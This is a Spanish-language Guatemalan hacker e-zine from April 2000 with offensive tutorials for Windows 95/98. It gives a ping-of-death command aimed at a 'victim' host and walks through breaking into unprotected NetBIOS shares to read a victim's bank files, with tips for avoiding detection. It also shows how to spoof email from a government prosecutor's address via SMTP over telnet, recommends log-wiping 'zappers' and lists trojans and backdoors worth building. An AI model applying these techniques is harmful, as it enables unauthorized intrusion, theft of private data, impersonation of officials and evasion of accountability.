Electronics, Entretaiment Time’s Guatemala

es una producción de TECHNODAt-@

Quincena 6.00 Edición # 6.14.04.2000

 

100% Chapines

Guatemala’s UnderGround magazine

 

·        Editorial

·        Seguridad en win9X

·        Sugerencias para un buen hacking

·        El ping de la muerte J

·        Recurso Compartidos (hacking)

·        Fake Emails con telnet

·        Créditos

 

 

 

Si tienes algún buen tip, truco reportaje, que quieres que

lo incluyamos en los futuros tirajes o problemas para recibir esta edición mándalos a:

etimegt@intelnet.net.gt

 

 

En esta ocasión no hay mucho que decir.

Solo que agradecemos a muchas personas que se han encargado de retransmitir estas ediciones solo que han puesto de su cosecha cambiando los créditos y los banners es por que rogamos si tu recibes esta edición, recuerdas que pertenece a etimegt un nombre registrado por technodata , bueno ya basta de regaños y pasemos a la edición.

 

Seguridad en Win9X

Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no  tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas  que nos piden un password las podemos cerrar pulsando sobre la X o también  nos basta con pulsar ctrl+atl+supr, con lo que nos saltaremos esta ventana sin meter ningun password. Por eso para que nuestro ventanas (nombre que se le da a win95/98   tendremos que instalarle algún paquete de seguridad disponible por la red, que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre puedes comprar alg

ún paquete comercial de seguridad, en mi opinión alguna veces una tontera, ya que nos pueden cobrar un precio abusivo y cuando llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada seguro 100%.  Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa   no es muy difícil, es cuestión de estar atento a las novedades, en otras  palabras estar informado.

Ataques Típicos a Nuestro Windows.

Lógicamente seremos muy propensos a ataques tipo DoS (denial of service),  como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,  etc...  Para estar protegidos lo que tenemos que hacer es pasarnos por los  web's de seguridad o el de la casa Microsoft en los cuales se cuelgan  los parches de estos ataques. No siempre funcionan pero nos ahorraran  muchos disgustos en muchos casos. La gente suele ser muy propensa a estas cosas porque no esta informada sobre estos ataques y por consiguiente  no se instala los parches correspondientes.

Protegiendo Nuestras Acciones.

 

Esta sección esta enfocada a esconder nuestros actos hacking por Internet. Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no  se entera de esto y deja muchas pistas.

 

Borrando Nuestras Huellas.

 

Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos conectado, como, desde donde y varias cosas mas), por eso hay que tener  mucho cuidado.

La mayoría de servidores que hackeemos por Internet serán unix, conviene  tener a mano "zappers", son programas que borran nuestras huellas en el   servidor. Existen muchos programas para este propósito que funcionan bajo Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por  desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y subirlo por FTP pero algo es algo.

 

Sugerencias para un buen Hacking

Sugerencias Para Un Mejor Hacking.

 

Aquí hablare sobre algunas ideas que pueden potenciar el hacking en  Win95/98 y la creación de nuevas herramientas.

 

- Programas troyanos que capturen el password del acceso a Internet.

- Programas para IP-Spoof.

- Creación de herramientas de redes para Win95/98.

- Wardialers.

- Programas para atacar otros Win95/98 (DoS).

- Nuevas Suites.

- Programas crackeadores del passwd.

- Programas criptograficos.

- Programas eliminadores de ficheros de forma segura.

- Puertas traseras. (backdorrs)

- Programas de administracion remota.

- Programas DoS para saltarse protecciones.

- Programas que realmente proporcionen seguridad a nuestro sistema.

 

 

 

El ping de la muerte J

Esta técnica no es propia de un Hacker sino de un Lamer (no quiero decir  Cracker para no ofender a nadie :) ya que únicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo les quiero decir que aunque aquí les explicare no es cuestión que lo uses por Internet atacando servidores.

La utilidad Ping sirve principalmente para saber si un servidor esta activo y además podemos calcular el trafico en la red según el tiempo de su  respuesta. Básicamente se le envía un paquete a un servidor y este nos contesta, solo que si se le envía un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producirá su caída. Para ejecutar este ataque solo  tenemos que escribir :

 

  c:\>ping -l 65510 victima.com

 

  Pues esta simple línea es muy destructiva, por lo que tened cuidado y antes de hacer tonterías lee la parte sobre seguridad y como borrar sus huellas.

 

Recursos Compartidos

Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de

otra persona por Internet y lo mejor del caso es que esta técnica nos la proporciona los propios programas del win95/98. Por supuesto no todo es tan

sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala

configuración del propio usuario al no configurar adecuadamente los recursos compartidos de su red corriendo sobre win95/98.

 

Para colarnos en el HD de otro ordenador debemos tener nuestro ordenador bien configurado, o sea el compartir recursos bien puesto y también tener el Netbios instalado. Para configurarlo, tenemos que tener activado la opción de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.  SI por el caso la opción esta desactivada simplemente pulsamos el botón de  "a
ñadir" y añadimos el servicio "Compartir ficheros e impresoras en redes  Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesión" en "Cliente para redes Microsoft". También tiene que estar activado el  "Cliente para redes Microsoft", que viene por defecto en

MIPC->Acceso Telefónico a Redes->Conexión a Inet que usaremos->boton derecho->  propiedades, debiendo estar activada la casilla "conectarse a la red".

 

Ahora ya podemos ponernos manos a la obra, entonces volvemos a una

ventana del MS-DOS y ejecutamos:

 

c:\>nbtstat -A (IP DE LA VICTIMA)

 

NetBIOS Remote Machine Name Table

 

Name               Type         Status

---------------------------------------------

VICTIMAMACHINE    <00>    UNIQUE     Registered

VICTIMAGROUP      <00>    GROUP      Registered

VICTIMAMACHINE    <03>    UNIQUE     Registered

VICTIMAMACHINE    <20>    UNIQUE     Registered

VICTIMAGROUP      <1E>    GROUP      Registered

 

MAC Address = 44-45-53-54-00-00

 

Cuando ejecutamos este comando nos saldrá una tabla como esta y el primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes ver la maquina se llama VICTIMAMACHINE.

 

Entonces ahora creamos / editamos el archivo LMHOSTS, si por el caso  encontraras uno que pone LMHOSTS.SAM no lo toques, poniendo la dirección IP

y el nombre de la maquina en cuestión, esto seria de la siguiente forma:

 

c:\>edit c:\windows\system32\LMHOSTS

 

VICTIMAMACHINE

 

Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando para añadir el ordenador de la victima a nuestro Netbios y

esto seria de la siguiente forma:

 

c:\>NBTSTAT -R

 

Ahora nos interesa saber que recursos comparte la victima y esto tampoco

nos traerá complicación alguna:

 

c:\>net view \\VICTIMAMACHINE

 

Shared resources at \\VICTIMAMACHINE

 

Sharename    Type         Comment

 -----------------------------------------

 BANCO        Disk

 

Y como podemos observar comparte una carpeta llamada BANCO.

 

Ahora ya podemos operar como si fuese una terminal mas en nuestra red local

sobre win95/98. Ya solo nos queda ejecutar el comando que queramos, si por

ejemplo queremos ver el contenido, solo tenemos que escribir:

 

c:\> dir \\VICTIMAMACHINE\BANCO

 

O para leer cualquier fichero de la carpeta:

 

c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT

 

Si queremos conectar al recurso compartido de forma grafica (o sea con

una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar

INICIO->BUSCAR PC y detendremos el PC remoto pero esto solo es posible

si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos

llamar, deberemos ejecutar:

 

c:\>NET USE e: \\MIPC\WINDOWS

 

Esta técnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11  y además comparte las carpetas sin contraseña en modo "Acceso a nivel  compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase  el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en  esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina  para que este autorizada, esto lo conseguiremos con el Regedit, por  desgracia los sistemas win95/98 y OSR2 que están ejecutando el Servidor Web Personal de Microsoft desactivan esta posibilidad de acceso remoto tras  informar de la conveniencia de hacerlo al usuario, ya que el servidor web  obliga a compartir carpetas aun sin tener red local.

 

Logicamente un usuario que haya tenido el despiste de conectarse a Internet con carpetas compartidas no toma luego medidas de control sobre quien entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser  pillados si por ejemplo un usuario ejecuta el programa Netwatch, que  muestra los usuarios conectados a nuestra computadora en cada momento y por supuesto el nombre de las computadoras por lo que es aconsejable cambiar el nombre de nuestra computadora usando el Regedit. Si nuestra maquina se  llama HACKERNOBO cambiamos todas la cadenas donde aparezca este nombre con el Regedit a un nombre menos sospechoso.

 

Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra  computadora no nos tendremos que preocupar del Netwatch, así conseguiremos

una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se

dará cuenta de nuestra entrada. También hay que decir que si la VICTIMAMACHINE quiere apagar su computadora le saldrá el mensaje del tipo

"hay otros usuarios conectados a su ordenador, si apaga se desconectaran"

si ocurre esto seremos pillados.

 

Decir que el comando Net, dispone de muchos parámetros que nos puede ser

útiles y además podemos jugar durante mucho tiempo con ellos :) los cuales

son los siguientes:

 

c:\>net /?

 

For more information about a specific Microsoft NET

command, type the command name followed by /?

(for example, NET VIEW /?).

 

NET CONFIG   Displays your current workgroup settings.

NET DIAG       Runs the Microsoft Network Diagnostics program to

                      display diagnostic information about your network.

NET HELP      Provides information about commands and

                      error messages.

NET INIT         Loads protocol and network-adapter drivers without

                      binding them to Protocol Manager.

NET LOGOFF  Breaks the connection between your computer and

                      the shared resources to which it is connected.

NET LOGON    Identifies you as a member of a workgroup.

NET PASSWORD Changes your logon password.

NET PRINT    Displays information about print queues

               and controls print jobs.

NET START    Starts services.

NET STOP     Stops services.

NET TIME     Displays the time on or synchronizes your computer's

                 clock with the clock on a Microsoft Windows for

               Workgroups, Windows NT, Windows 95, or NetWare time server.

NET USE      Connects to or disconnects from a shared

               resource or displays information about

               connections.

NET VER      Displays the type and version number of the

                workgroup redirector you are using.

NET VIEW     Displays a list of computers that share

               resources or a list of shared resources

               on a specific computer.

  The command was completed successfully.

 

Pues aquí tienes todos los parámetros disponibles del comando Net, por lo que solo nos queda jugar un rato para saber que es cada cosa. No es  divertido si lo explico todo.

 

Fake Mail Con Telnet

Esta técnica nos ayuda a suplantar la dirección de correo electrónica que

Queramos J. La verdad es que tiene pocos usos, en mi opinión debido a

una serie de razones pero siempre puede servir para gastar una buena

broma enviando aun amigo un mail del director de la Universidad diciendo  que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la Nacional Civil. (bueno que esos burros ni escribir saben)

La verdad es que es muy sencillo de hacer pero por supuesto habrá que tomar unas ciertas medidas de seguridad, que ya explique.  Lo primero  que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del

Telnet y donde pone "puerto" en vez de poner  el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos  a que nos conectemos a ese puerto, cuando conectemos nos saldrá un  mensaje y esta esperando a que pulsemos alguna tecla:

 

220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)

[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)

 

Muchas veces lo que podemos hacer es escribir "help" y saldrán todos los  comandos, también podemos escribir "echo" y la maquina nos contestara que esta lista. Para escribir un mail hay que seguir una serie de pasos:

 

mail from:webmaster@ministeriopublico.gov.gt <- ponemos de donde viene.

 

El servidor nos contesta:

 

250 < webmaster@ministeriopublico.gov.gt > ... Sender Okay

 

Ahora escribimos:

 

rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.

 

El servidor nos contesta:

 

250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay

 

Ahora escribimos:

 

data

 

El servidor nos contesta:

 

354 Enter mail, end with "." on a line by itself

 

Ahora escribimos:

 

 To: nob_ody@xxxxxxxx.com

 From: gc.uco@mad.servicom.es

 Subject: Te querremos!!

 Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te

 querremos fichar para el departamento.

                                              Direccion General de

                                                Ministerio publico

  .  <- para terminar el mail.

 

 El servidor nos contesta:

 

 250 Mail accepted

 

 Ahora escribimos:

 

 quit  <- ya esta todo listo J

 

Pues ves como es realmente simple!! Pero antes de empezar a jugar con  esta tecnica tenemos que asegurarnos que el servidor de mail no registra   nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta anónima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet sobre servidores que permiten hacer esto.

 

 

 

Distribución y Edición

Webmaster : T3ChNoDAt-@

Editores: T3ChNoDAt-@

Esta es una publicación 100% chapina todos los derechos reservados a T3ChNoDat-@ S.A. E-TimeGt es un nombre registrado por

T3ChNoDat-@ S.A. Guatemala Abril del 2000

 

Ahora obtén los anteriores números en

www.technohacker.cjb.net

 

¡ANUNCIATE CON  NOSOTROS!

Si estas interesado en que aparezca tu pagina, negocio o tan solo un banner de cualquier cosa en esta publicación, escribe a etimegt@intelnet.net.gt

 

¡Estamos en busca de reporteros!

Si te interesa participar en tu tiempo libre en nuestra revista pues apuntate en

etimegt@intelnet.net.gt

  

 

La  pagina recomendada

http://www.gamespot.com/

 

[Regresa a sitio oficial]